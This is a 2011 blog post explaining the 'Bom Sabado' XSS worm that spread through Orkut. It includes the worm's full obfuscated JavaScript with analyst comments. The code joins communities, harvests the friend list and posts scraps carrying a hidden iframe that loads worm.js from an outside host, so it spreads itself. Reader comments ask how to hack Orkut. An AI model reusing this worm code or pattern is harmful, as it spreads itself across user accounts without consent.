Saturday, 2 April 2011

Orkut attacked by 'Bom Sabado' worm




‘Bom Sabado!’‘Bom Sabado!’‘Bom Sabado!’ 
Hi friends, did you find this scrap in your scrapbook from many of your friends? If yes, then don't visit the profile of the person this message came from, because your friend's profile is now infected by a virus named ‘Bom Sabado!’. If you visit any affected profile, your profile and your system will also be affected by this virus!

 



What is ‘Bom Sabado!’?
'Bom Sabado' is a new XSS (cross-site scripting) worm, written specifically to target Orkut.
'Bom Sabado' is a Portuguese word which means 'Good saturday.'
There is only one country in which Orkut is still the no. 1 social website, so it is assumed that someone made this virus to attack Orkut's popularity.


How it works?
When anyone opens a page that is infected by this worm, a JavaScript file (from http://tptools.org/worm.js or http://tptools.org/worm.js#%3Cwbr%3E#:1) runs automatically. It automatically joins some communities and sends a scrap to your friends with the text “Bom Sabado!” and an iframe that loads that JavaScript again for your friends, so they too join the communities and send the scrap on to their friends. This worm also steals cookies from your browser.


Orkut has Temporarily Fixed the issue.
On the Orkut Support Forums, a 'Top Contributor' has declared that Orkut has temporarily fixed the issue.
What 'temporarily' means here is, I guess, that they have only removed the JavaScript from the site http://tptools.org; it will take time to fix this hole in Orkut itself and protect Orkut in the future. So just be aware!

I suggest you all disable JavaScript in your browser to avoid this type of problem :)


Suggestion for users Affected by Bom Sabado
As this virus steals cookies from the browser, it is suggested that you clear your browser's cookies immediately and change all your passwords.

Coding of Bom Sabado Worm taken from http://tptools.org/
/*
 * Analyst notes. The code below is reproduced exactly as printed in the post.
 *
 * Obfuscation: every string is moved into the _0x37a1 table as \xNN escapes
 * and properties are addressed by table index. Decoding the table yields the
 * XMLHttpRequest method names (open, setRequestHeader, send), the form field
 * names, and three relative endpoints: Scrapbook, RequestFriends and
 * CommunityJoin.
 *
 * What the visible code does, in order:
 *  - createXMLHttpRequest(): returns a native XMLHttpRequest, falling back to
 *    an ActiveXObject (table entry 0) if the constructor throws.
 *  - data: a form-encoded prefix built from two values read out of the JSHDF
 *    object (table entries 2 and 4, sent as POST_TOKEN and signature).
 *    JSHDF is not defined in this listing; presumably it is a global exposed
 *    by the hosting page. NOTE(review): these look like the site's anti-CSRF
 *    values. Script running inside the page's origin can read them, which is
 *    why a request token gives no protection once script injection is
 *    possible.
 *  - joinCMM(id): synchronous POST (third argument to open is false) to the
 *    community-join endpoint; called for five hard-coded ids (entries 26-30).
 *  - requestFriends(): synchronous GET of the friend list, then removes the
 *    "while (true);" guard prefix (entry 20) from the response text. A guard
 *    of that kind targets cross-origin script inclusion; a same-origin
 *    request reads the body as text and strips it.
 *  - eval(): the stripped response is evaluated into a global named friends.
 *  - for-in loop: calls sendScrap() with the id of each entry in
 *    friends.data.list. x and uid are assigned without declaration, so they
 *    become implicit globals.
 *  - sendScrap(id): synchronous POST to the scrapbook endpoint. The scrap text
 *    (entry 12) is markup containing a hidden iframe whose onload handler
 *    loads the worm.js URL named in the post again. This is the
 *    self-propagation step.
 *
 * NOTE(review): nothing in this listing reads document.cookie or sends data to
 * a third-party host; every request here is a relative URL. The cookie theft
 * described in the post is not visible in this code and would have to come
 * from elsewhere. Confirm before relying on either claim.
 *
 * NOTE(review): the line break inside the \x63 escape of table entry 25 is an
 * artefact of how the page was wrapped; as printed, the listing is not valid
 * JavaScript.
 *
 * Defensive reading: the enabling condition is user-supplied scrap markup
 * reaching the page with an event-handler attribute intact. Output encoding or
 * strict sanitization of that markup removes the injection point, and a
 * Content-Security-Policy restricting script sources would block the external
 * script load.
 */
var _0x37a1=["\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x2E\x58\x4D\x4C\x48\x74\x74\x70","\x50\x4F\x53\x54\x5F\x54\x4F\x4B\x45\x4E\x3D","\x43\x47\x49\x2E\x50\x4F\x53\x54\x5F\x54\x4F\x4B\x45\x4E","\x26\x73\x69\x67\x6E\x61\x74\x75\x72\x65\x3D","\x50\x61\x67\x65\x2E\x73\x69\x67\x6E\x61\x74\x75\x72\x65\x2E\x72\x61\x77","\x50\x4F\x53\x54","\x53\x63\x72\x61\x70\x62\x6F\x6F\x6B\x3F","\x6F\x70\x65\x6E","\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65","\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x78\x2D\x77\x77\x77\x2D\x66\x6F\x72\x6D\x2D\x75\x72\x6C\x65\x6E\x63\x6F\x64\x65\x64\x3B","\x73\x65\x74\x52\x65\x71\x75\x65\x73\x74\x48\x65\x61\x64\x65\x72","\x26\x73\x63\x72\x61\x70\x54\x65\x78\x74\x3D","\x3C\x73\x74\x79\x6C\x65\x2F\x3E\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x74\x79\x6C\x65\x3D\x64\x69\x73\x70\x6C\x61\x79\x3A\x6E\x6F\x6E\x65\x20\x6F\x6E\x6C\x6F\x61\x64\x3D\x22\x61\x20\x3D\x20\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74\x28\x20\x27\x73\x63\x72\x69\x70\x74\x27\x29\x3B\x61\x2E\x73\x72\x63\x20\x3D\x20\x27\x2F\x27\x20\x2B\x20\x27\x2F\x74\x70\x74\x6F\x6F\x6C\x73\x2E\x6F\x27\x2B\x27\x72\x67\x2F\x77\x6F\x72\x6D\x2E\x6A\x73\x27\x2B\x27\x23\x3C\x77\x62\x72\x3E\x23\x27\x3B\x20\x64\x6F\x63\x75\x6D\x65\x6E\x74\x20\x2E\x20\x62\x6F\x64\x79\x20\x2E\x20\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64\x28\x20\x61\x20\x29\x22\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E\x42\x6F\x6D\x20\x53\x61\x62\x61\x64\x6F\x21","\x26\x75\x69\x64\x3D","\x26\x41\x63\x74\x69\x6F\x6E\x2E\x73\x75\x62\x6D\x69\x74\x3D\x31","\x73\x65\x6E\x64","\x47\x45\x54","\x52\x65\x71\x75\x65\x73\x74\x46\x72\x69\x65\x6E\x64\x73\x3F\x72\x65\x71\x3D\x66\x6C\x26\x75\x69\x64\x3D","\x75\x69\x64","\x26\x6F\x78\x68\x3D\x31","\x77\x68\x69\x6C\x65\x20\x28\x74\x72\x75\x65\x29\x3B\x20\x26\x26\x26\x53\x54\x41\x52\x54\x26\x26\x26","","\x72\x65\x70\x6C\x61\x63\x65","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74","\x43\x6F\x6D\x6D\x75\x6E\x69\x74\x79\x4A\x6F\x69\x6E\x3F\x63\x6D\x6D\x3D","\x26\x41\x6
3\x74\x69\x6F\x6E\x2E\x6A\x6F\x69\x6E\x3D\x31","\x31\x30\x36\x36\x39\x38\x38\x30\x38","\x36","\x35\x35\x38\x34\x39\x34","\x31\x30\x36\x36\x39\x38\x36\x32\x38","\x31\x30\x36\x36\x39\x31\x33\x34\x31","\x76\x61\x72\x20\x66\x72\x69\x65\x6E\x64\x73\x20\x3D\x20","\x3B","\x6C\x69\x73\x74","\x64\x61\x74\x61","\x69\x64"];function createXMLHttpRequest(){try{return new XMLHttpRequest();} catch(e){return new ActiveXObject(_0x37a1[0]);} ;} ;var data=_0x37a1[1]+encodeURIComponent(JSHDF[_0x37a1[2]])+_0x37a1[3]+encodeURIComponent(JSHDF[_0x37a1[4]]);function sendScrap(_0x7c2bx4){var _0x7c2bx5=createXMLHttpRequest();_0x7c2bx5[_0x37a1[7]](_0x37a1[5],_0x37a1[6],false);_0x7c2bx5[_0x37a1[10]](_0x37a1[8],_0x37a1[9]);_0x7c2bx5[_0x37a1[15]](data+_0x37a1[11]+encodeURIComponent(_0x37a1[12])+_0x37a1[13]+_0x7c2bx4+_0x37a1[14]);} ;function requestFriends(){var _0x7c2bx5=createXMLHttpRequest();_0x7c2bx5[_0x37a1[7]](_0x37a1[16],_0x37a1[17]+JSHDF[_0x37a1[18]]+_0x37a1[19],false);_0x7c2bx5[_0x37a1[15]](null);return (_0x7c2bx5[_0x37a1[23]])[_0x37a1[22]](_0x37a1[20],_0x37a1[21]);} ;function joinCMM(_0x7c2bx8){var _0x7c2bx5=createXMLHttpRequest();_0x7c2bx5[_0x37a1[7]](_0x37a1[5],_0x37a1[24]+_0x7c2bx8,false);_0x7c2bx5[_0x37a1[10]](_0x37a1[8],_0x37a1[9]);_0x7c2bx5[_0x37a1[15]](data+_0x37a1[25]);} ;joinCMM(_0x37a1[26]);joinCMM(_0x37a1[27]);joinCMM(_0x37a1[28]);joinCMM(_0x37a1[29]);joinCMM(_0x37a1[30]);eval(_0x37a1[31]+requestFriends()+_0x37a1[32]);for(x in friends[_0x37a1[34]][_0x37a1[33]]){uid=(friends[_0x37a1[34]][_0x37a1[33]][x]);sendScrap(uid[_0x37a1[35]]);} ;

6 comments:

  1. Nyc wrk dude
    nd thnx for d knwledge

  2. Really cool knwledge cn this virus work nw also plz answer

  3. Cn dis virus work now also?
    Answer zaroor btaiyega

  4. Can you please tell me how to hack orkut

  5. Plz tell me some ways to hack orkut
    my mail id is riya.sharma141@gmail.com

  6. @jyoti
    well the most common and the best ways that have about 60%chances of success are all listed on how to hack mail accounts
    bt if you want i will post the best way to hack orkut
